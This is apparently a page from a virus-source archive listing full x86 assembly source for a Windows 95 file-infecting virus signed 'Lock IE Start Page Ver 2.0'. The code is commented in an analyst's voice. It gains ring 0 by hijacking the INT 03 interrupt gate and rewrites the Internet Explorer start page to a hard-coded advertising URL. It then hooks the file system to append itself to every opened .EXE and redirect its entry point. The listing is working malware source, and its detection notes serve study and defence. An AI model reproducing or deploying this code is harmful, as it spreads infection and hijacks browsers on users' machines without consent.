
📄 win95.lockiepage.878原代码 .txt

📁 病毒源码 包括世上第一个病毒源码、蠕虫源码、冲击波源码
include win32v.inc 
extrn ExitProcess: proc 
.586p 
.model flat,stdcall 
.data 
; Ring-3 entry stub. Saves all registers, locates the IDT with SIDT and keeps
; the original INT 03 gate descriptor in ecx:edx so the ring-0 handler can put
; it back. The CALL at the end is not a normal call: its pushed return address
; (the address of @@MyInt03) is what @@SetMyInt03 pops into the gate.
; NOTE(review): writing the IDT from user mode presumably only succeeds on
; Windows 9x (the page title says win95) - confirm; not expected on NT-family systems.
@@Start: 
pushad 
push eax 
sidt [esp-2] ;store IDT limit+base so that the base lands in the dword just pushed 
pop esi ;esi = IDT base address 
add esi,3*8 ;esi -> gate descriptor of INT 03 (8 bytes per entry) 
mov ecx,[esi] 
mov edx,[esi+4] ;ecx:edx = original INT 03 gate descriptor 
call @@SetMyInt03 
; Ring-0 body, entered through the redirected INT 03 gate.
; In: esi -> INT 03 gate descriptor, ecx:edx = its original contents.
; Behaviour visible in this block:
;   1. restores the original INT 03 descriptor;
;   2. checks DR3 against VirusFlag and leaves if the marker is already set;
;   3. sets the 'Start Page' value under
;      HKCU 'SoftWare\MicroSoft\Internet Explorer\Main' to the HttpName URL;
;   4. allocates ring-0 memory, copies VirusSize bytes there and installs
;      @@MyFileHookApi in the copy as a file-system hook.
; Analyst artifacts on this page: the registry path/value/URL strings below and
; the use of DR3 as a residency marker.
; Strings are embedded in the code stream; each CALL over a string pushes the
; string's address as an argument.
@@MyInt03: ;author: my INT 03 ring-0 routine 
pushad 
mov [esi],ecx 
mov [esi+4],edx ;restore the original INT 03 gate descriptor 
mov eax,dr3 ;DR3 is used as the residency marker 
mov ecx,VirusFlag 
@@IsInstalled: 
cmp eax,ecx 
jz @@ExitHook 
mov dr3,ecx ;set the residency marker 
call @@SetVxdCall ;rewrite every VxDCall site to the 'int 20h + service id' form 
@@SetVxdCallOk: 
push eax ;reserve a stack dword that receives the opened key handle 
push esp ;pointer to that dword 
call @@PushPathNameAddr 
PathName db 'SoftWare\MicroSoft\Internet Explorer\Main',0 
@@PushPathNameAddr: 
push 80000001h ;root key constant (HKEY_CURRENT_USER) 
@@RegOpenKey: 
int 20h ;open the registry key 
dd 00010148h ;VMMCall_RegOpenKey 
add esp,3*4 
pop ebp ;ebp = key handle written by the call 
or eax,eax 
jnz short @@OpenRegKeyError 
push 040h 
call @@PushHttpNameAddr 
HttpName db 'http://202.115.16.8/~ekang',0 ;author: the advertising page 
@@PushHttpNameAddr: 
push 01h 
push 00h 
call @@PushValueNameAddr 
ValueName db 'Start Page',0 
@@PushValueNameAddr: 
push ebp 
@@RegSetValueEx: 
int 20h ;set the IE Start Page value to the URL above 
dd 00010152h ;VMMCall_RegSetValueEx 
add esp,6*4 
push ebp 
@@RegCloseKey: 
int 20h ;close the registry handle 
dd 00010149h ;VMMCall_RegCloseKey 
add esp,1*4 
@@OpenRegKeyError: 
; Eight stacked arguments for the page-allocation service.
; NOTE(review): their meaning depends on the VMM prototype, which is not shown here.
push L 0fh 
push L 00 
push L -1 
push L 00 
push L 00 
push L 00 
push L 01 
push L 02 
@@AllocPage: 
int 20h ;allocate memory for the resident copy (author's note: size=1000h) 
dd 00010053h ;VMMCall_AllocPage 
add esp,8*4 
or eax,eax 
jz short @@ExitHook ;allocation failed 
mov edi,eax 
call @@GetVirusStartAddr 
@@GetVirusStartAddr: 
pop esi ;esi = run-time address of this label 
sub esi,OFF @@GetVirusStartAddr-OFF @@Start ;esi = run-time address of @@Start 
mov ecx,VirusSize 
cld 
rep movsb ;copy the body into the allocated ring-0 memory 
mov edi,eax ;edi = base of the copy 
add eax,OFF @@MyFileHookApi-OFF @@Start ;eax = hook routine inside the copy 
push eax 
@@HookFileApi: 
int 20h ;install the file-system hook 
dd 00400067h ;VMMCall_HookFileSystem 
add esp,04h 
mov [edi+OFF OldFileHookApi-@@Start],eax ;keep the returned value for chaining to the previous hook 
@@ClsOptFlag: 
xor eax,eax ;clear the re-entrancy flag 
mov [edi.OFF OptFlag-OFF @@Start],eax 
@@ExitHook: 
popad 
iretd ;back to ring 3 after the INT 03 (author calls it @@Ring3GoOn; the label in this listing is spelled @@Ring3GoNo) 
; Redirects the INT 03 gate and triggers it, then resumes the host program.
; In: esi -> INT 03 gate descriptor; top of stack = return address pushed by
;     the CALL in @@Start, i.e. the address of @@MyInt03.
; The two 16-bit pops split that address into the gate's low offset word
; (bytes 0-1) and high offset word (bytes 6-7).
@@SetMyInt03: 
cli 
pop W[esi] 
pop W[esi+6] ;overwrite the INT 03 handler offset 
int 03 ;enter ring 0 at @@MyInt03 
@@Ring3GoNo: 
sti 
popad 
; 0B8h followed by a dword is an encoded 'mov eax,imm32'; keeping the
; immediate as a named dword lets @@OptFile patch OldAppEntry in its copy.
MoveToEax db 0b8h 
OldAppEntry dd OFF @@Exit 
jmp eax ;jump to the original program entry 
; File-system hook routine installed by the ring-0 setup code.
; Prototype given by the author:
;IFSFileHookFunc(pIFSfn,nfn,nDrv,nRType,nCP,pir); 
; After PUSHAD + 'mov ebp,esp', argument k (1-based) is at [ebp+(8+1+(k-1))*4]:
; eight saved registers, then the return address, then the arguments.
; Only calls whose function number equals 36 are inspected; every call is then
; forwarded to the previously installed hook.
@@MyFileHookApi: 
pushad 
mov ebp,esp 
push ds 
push es 
push ss 
pop ds 
push ss 
pop es ;ds = es = ss (set up the data segments) 
cmp D[ebp+(8+1+1)*4],36 ;second argument (nfn): is this a file-open call? 
jnz short @@OldFileHookApi 
call @@GetPathName 
@@OldFileHookApi: 
pop es 
pop ds 
popad 
; FF 25 are the opcode bytes of an indirect near jmp; the dword that follows is
; its memory operand, filled at install time with the value returned by the
; hook-install service.
JmpMem dw 25ffh ;jump to the previous file-hook function 
OldFileHookApi dd ? 
OptFlag dd 00h ;re-entrancy flag: holds VirusFlag while a request is being processed 
; Builds the ANSI path of the file being opened and hands it to @@OptFile when
; it ends in '.EXE'.
; In: ebp = hook frame set up by @@MyFileHookApi; top of stack = return
;     address, which equals the run-time address of @@OldFileHookApi and is
;     used as the base for position-independent data access.
; The OptFlag dword guards against re-entry, since @@OptFile itself issues
; file I/O that passes through the hook again.
@@GetPathName: 
pop esi 
push esi ;peek at the return address and push it back 
@@IsOptFlagSet: 
add esi,OFF OptFlag-OFF @@OldFileHookApi ;esi -> OptFlag 
mov ecx,VirusFlag 
cmp [esi],ecx ;already inside the hook (re-entry)? 
jz short @@RetOldHookApi 
@@SetOptFlag: 
mov [esi],ecx ;set the re-entrancy flag 
add esi,OFF FilePathBuffer-OFF OptFlag ;esi -> FilePathBuffer 
mov edi,esi 
mov eax,[ebp+(8+1+2)*4];Get nDriver(1=A;2=B,3=C...) 
add ax,':A'-1 ;turn the drive number into a two-character drive prefix 
cld 
stosw ;start the ANSI path with the drive prefix 
mov esi,[ebp+(8+1+5)*4];Get ioreq 
mov eax,[esi+0ch];Get UniCode PathName Addr 
add eax,04h ;skip the first 4 bytes of that structure - NOTE(review): layout not shown here 
push L 0 
push L 100h 
push eax 
push edi 
@@UniToBCSPath: 
Int 20h ;append the converted path after the drive prefix 
dd 00400041h ;VMMCall_UniToBCSPath 
add esp,4*4 
or eax,eax ;eax = returned length, 0 means nothing converted 
jz short @@ClearOptFlag 
mov eax,[edi+eax-4] ;last four characters of the path 
not eax 
cmp eax,not ('EXE.') ;does the name end in '.EXE'? 
jnz short @@ClearOptFlag 
call @@OptFile 
@@ClearOptFlag: 
pop esi 
push esi ;peek at the return address and push it back 
add esi,OFF OptFlag-OFF @@OldFileHookApi 
xor eax,eax 
mov [esi],eax ;clear the re-entrancy flag 
@@RetOldHookApi: 
ret 
; PE infection routine: appends the body to the last section of the file and
; redirects the entry point to it.
; In: edi = FilePathBuffer+2 (just past the drive prefix).
; Register use of @@FileIo as it appears from the calls below - eax = function
; code, ebx = file handle, ecx = byte count or attributes, edx = file position,
; esi = buffer or path. NOTE(review): inferred from usage, confirm against the
; IFS manager documentation.
; Changes an analyst can look for in an affected file, all visible below:
;   - the header CheckSum field equals VirusFlag (the infection marker);
;   - the entry-point RVA equals last-section RVA + its former physical size;
;   - the last section's physical size has grown by VirusSize.
; Files are skipped when fewer than 'size ReadFileBuffer' bytes can be read,
; when the MZ/PE signatures are missing, or when the header offsets fall
; outside the buffer.
@@OptFile: ;author: modify the PE file and append the body to it 
mov esi,edi 
dec esi 
dec esi 
mov ebp,esi ;ebp = esi = FilePathBuffer (start of the path) 
mov eax,4300h 
call @@FileIo ;IFSCall_FileIo: get file attributes 
jc @@OpenFileFalse 
push ecx ;save the file attributes 
xor ecx,ecx 
mov eax,4301h 
call @@FileIo ;IFSCall_FileIo: set file attributes to 0 
xor eax,eax 
mov edx,eax 
inc edx 
mov ebx,edx 
inc ebx 
mov ax,0d500h 
call @@FileIo ;IFSCall_FileIo: open the file 
pop ecx ;restore the saved attributes into ecx 
pushfd ;keep the carry flag from the open across the next call 
push eax ;save the ring-0 file handle 
mov eax,4301h 
call @@FileIo ;IFSCall_FileIo: put the original attributes back 
pop ebx ;ebx = ring-0 file handle 
popfd 
jc @@OpenFileFalse ;open failed 
@@GetReadFileBuffer: 
add esi,size FilePathBuffer ;esi -> ReadFileBuffer 
mov ecx,size ReadFileBuffer 
xor edx,edx ;file position 0 
mov eax,0d600h ;IFSCall_FileIo: read file 
call @@FileIo 
jc @@CloseFile 
cmp eax,ecx ;require a full buffer's worth of bytes 
jnz @@CloseFile 
cmp word ptr [esi],'ZM' ;DOS 'MZ' signature present? 
jnz @@CloseFile 
movzx eax,word ptr[esi+3ch] ;offset of the PE header (low word of the field at 3Ch) 
cmp eax,size ReadFileBuffer-200h ;PE header must start well inside the buffer 
ja @@CloseFile 
add esi,eax ;esi -> PE header 
cmp [esi.fhPEFlag],'EP' ;'PE' signature present? 
jnz @@CloseFile 
cmp [esi.fhCheckSum],VirusFlag ;already infected? 
jz @@CloseFile 
mov [esi.fhCheckSum],VirusFlag ;set the infection marker 
@@SaveOldAppEntryRVA: 
mov eax,[esi.fhEntryRVA] 
add eax,[esi.fhImageBase] ;linear address of the original entry point 
mov [ebp+OFF OldAppEntry-OFF FilePathBuffer],eax ;patch it into the in-memory copy before that copy is written out 
movzx ecx,[esi.fhObjectCount] 
dec ecx 
mov eax,size ObjectTable 
mul ecx ;eax = byte offset of the last section-table entry 
cmp eax,size ReadFileBuffer-200h 
ja short @@CloseFile 
lea edi,[esi.fhObjectTable00+eax] ;edi -> last section-table entry 
mov edx,[edi.otPhysOffset] 
add edx,[edi.otPhysSize] ;edx = file offset just past the last section's data 
mov ecx,VirusSize 
push esi 
@@GetVirusBase: 
mov esi,ebp 
sub esi,OFF FilePathBuffer-OFF @@Start ;esi -> start of the resident copy 
mov eax,0d601h 
call @@FileIo ;IFSCall_FileIo: write the body at the end of the last section 
pop esi 
jc short @@CloseFile 
@@SetNewEntryRVA: 
mov eax,[edi.otPhysSize] 
add eax,[edi.otRVA] 
mov [esi.fhEntryRVA],eax ;change the entry-point RVA (relative virtual address) 
@@FixOtherHeaderVar: ;adjust the related header fields 
add [edi.otPhysSize],ecx ;physical size grows by the byte count in ecx 
mov eax,[edi.otPhysSize] 
sub eax,[edi.otVirtSize] 
jb short @@VirtSizeIsBigger 
@@PhysSizeIsBigger: 
add [edi.otVirtSize],eax ;raise the virtual size to the new physical size 
add [esi.fhImageSize],eax ;and the image size by the same amount 
@@VirtSizeIsBigger: 
nop 
@@GetReadFileBuffer0: 
mov esi,ebp 
add esi,size FilePathBuffer ;esi -> ReadFileBuffer (modified header) 
@@WriteBackFileHeader: 
mov ecx,size ReadFileBuffer 
xor edx,edx 
mov eax,0d601h 
call @@FileIo ;IFSCall_FileIo: write the modified header back to the file 
@@CloseFile: 
mov eax,0d700h 
call @@FileIo ;IFSCall_FileIo: close the file 
@@OpenFileFalse: 
ret 
; Single shared call site for the file I/O service; every file operation in
; @@OptFile goes through it. Arguments are passed in registers by the caller
; and the result comes back in eax and the carry flag, as the callers' JC
; tests show.
@@FileIo: 
int 20h ;author: IFSCall_FileIO sub-function 
dd 00400032h 
ret 
; Rewrites each of the seven VxDCall sites to the 'int 20h' + service-id form
; before the body is used and copied.
; In: top of stack = return address, equal to the run-time address of
;     @@SetVxdCallOk, used as the base for all site offsets.
; For each site: STOSW writes the two bytes CD 20 (int 20h) and MOVSD copies
; the next service id from @@VxdCallTable, so the table order must match the
; order of the sites below.
; NOTE(review): presumably needed because the system rewrites executed
; VxDCall sites in place - confirm.
@@SetVxdCall: ;author: restore the VXDCALL (int 20h) instructions 
pop ebx 
push ebx ;ebx = run-time address of @@SetVxdCallOk 
mov ax,020cdh ;bytes CD 20 = int 20h 
lea esi,[ebx+OFF @@VxdCallTable-@@SetVxdCallOk] ;esi -> service-id table 
cld 
lea edi,[ebx+OFF @@RegOpenKey-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@RegSetValueEx-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@RegCloseKey-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@AllocPage-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@HookFileApi-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@UniToBCSPath-OFF @@SetVxdCallOk] 
stosw 
movsd 
lea edi,[ebx+OFF @@FileIo-OFF @@SetVxdCallOk] 
stosw 
movsd 
ret 
; Service ids copied back into the call sites by @@SetVxdCall, in site order.
@@VxdCallTable: ;VxD call list 
dd 00010148h ;VMMCall_RegOpenKey 
dd 00010152h ;VMMCall_RegSetValueEx 
dd 00010149h ;VMMCall_RegCloseKey 
dd 00010053h ;VMMCall_AllocPage 
dd 00400067h ;IFSCall_HookFileApi 
dd 00400041h ;IFSCall_UniToBCSPath 
dd 00400032h ;IFSCall_FileIo  
; Plain-text author string stored in the body; usable as a static signature string.
VirusMsg db 'Lock IE Start Page Ver 2.0,By Whg 2001.6.13',0 
@@VirusEnd: 
; VirusSize = number of bytes from @@Start to @@VirusEnd. VirusFlag is the same
; number and serves as the marker value in DR3, in OptFlag and in the PE
; CheckSum field of modified files.
VirusSize=OFF @@VirusEnd-OFF @@Start 
VirusFlag=VirusSize 
; The two buffers follow @@VirusEnd, so they are not counted in VirusSize.
FilePathBuffer db 100h dup(?) ;ANSI file path buffer 
ReadFileBuffer db 900h dup(?) ;buffer for the head of the original PE file 
; Stand-in host program for this first-generation sample: OldAppEntry is
; initialised to @@Exit, so after the stub finishes, control arrives here and
; the process terminates with exit code 0.
.code 
@@Exit: 
call ExitProcess,L 0 
ends 
end @@Start ;the program entry point is @@Start, which is placed in the .data segment 
